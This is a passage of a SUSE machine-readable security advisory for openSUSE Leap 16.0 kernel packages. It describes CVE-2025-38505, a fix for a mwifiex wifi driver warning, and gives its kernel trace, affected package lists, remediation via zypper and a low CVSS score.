"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38423"
},
{
"cve": "CVE-2025-38505",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38505"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: discard erroneous disassoc frames on STA interface\n\nWhen operating in concurrent STA/AP mode with host MLME enabled,\nthe firmware incorrectly sends disassociation frames to the STA\ninterface when clients disconnect from the AP interface.\nThis causes kernel warnings as the STA interface processes\ndisconnect events that don\u0027t apply to it:\n\n[ 1303.240540] WARNING: CPU: 0 PID: 513 at net/wireless/mlme.c:141 cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.250861] Modules linked in: 8021q garp stp mrp llc rfcomm bnep btnxpuart nls_iso8859_1 nls_cp437 onboard_us\n[ 1303.327651] CPU: 0 UID: 0 PID: 513 Comm: kworker/u9:2 Not tainted 6.16.0-rc1+ #3 PREEMPT\n[ 1303.335937] Hardware name: Toradex Verdin AM62 WB on Verdin Development Board (DT)\n[ 1303.343588] Workqueue: MWIFIEX_RX_WORK_QUEUE mwifiex_rx_work_queue [mwifiex]\n[ 1303.350856] pstate: 60000005 (nZCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n[ 1303.357904] pc : cfg80211_process_disassoc+0x78/0xec [cfg80211]\n[ 1303.364065] lr : cfg80211_process_disassoc+0x70/0xec [cfg80211]\n[ 1303.370221] sp : ffff800083053be0\n[ 1303.373590] x29: ffff800083053be0 x28: 0000000000000000 x27: 0000000000000000\n[ 1303.380855] x26: 0000000000000000 x25: 00000000ffffffff x24: ffff000002c5b8ae\n[ 1303.388120] x23: ffff000002c5b884 x22: 0000000000000001 x21: 0000000000000008\n[ 1303.395382] x20: ffff000002c5b8ae x19: ffff0000064dd408 x18: 0000000000000006\n[ 1303.402646] x17: 3a36333a61623a30 x16: 32206d6f72662063 x15: ffff800080bfe048\n[ 1303.409910] x14: ffff000003625300 x13: 0000000000000001 x12: 0000000000000000\n[ 1303.417173] x11: 0000000000000002 x10: ffff000003958600 x9 : ffff000003625300\n[ 1303.424434] x8 : ffff00003fd9ef40 x7 : ffff0000039fc280 x6 : 0000000000000002\n[ 1303.431695] x5 : ffff0000038976d4 x4 : 0000000000000000 x3 : 0000000000003186\n[ 1303.438956] x2 : 000000004836ba20 x1 : 0000000000006986 x0 : 00000000d00479de\n[ 1303.446221] Call trace:\n[ 1303.448722] cfg80211_process_disassoc+0x78/0xec [cfg80211] (P)\n[ 1303.454894] cfg80211_rx_mlme_mgmt+0x64/0xf8 [cfg80211]\n[ 1303.460362] mwifiex_process_mgmt_packet+0x1ec/0x460 [mwifiex]\n[ 1303.466380] mwifiex_process_sta_rx_packet+0x1bc/0x2a0 [mwifiex]\n[ 1303.472573] mwifiex_handle_rx_packet+0xb4/0x13c [mwifiex]\n[ 1303.478243] mwifiex_rx_work_queue+0x158/0x198 [mwifiex]\n[ 1303.483734] process_one_work+0x14c/0x28c\n[ 1303.487845] worker_thread+0x2cc/0x3d4\n[ 1303.491680] kthread+0x12c/0x208\n[ 1303.495014] ret_from_fork+0x10/0x20\n\nAdd validation in the STA receive path to verify that disassoc/deauth\nframes originate from the connected AP. Frames that fail this check\nare discarded early, preventing them from reaching the MLME layer and\ntriggering WARN_ON().\n\nThis filtering logic is similar with that used in the\nieee80211_rx_mgmt_disassoc() function in mac80211, which drops\ndisassoc frames that don\u0027t match the current BSSID\n(!ether_addr_equal(mgmt-\u003ebssid, sdata-\u003evif.cfg.ap_addr)), ensuring\nonly relevant frames are processed.\n\nTested on:\n- 8997 with FW 16.68.1.p197",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38505",
"url": "https://www.suse.com/security/cve/CVE-2025-38505"
},
{
"category": "external",
"summary": "SUSE Bug 1248185 for CVE-2025-38505",
"url": "https://bugzilla.suse.com/1248185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
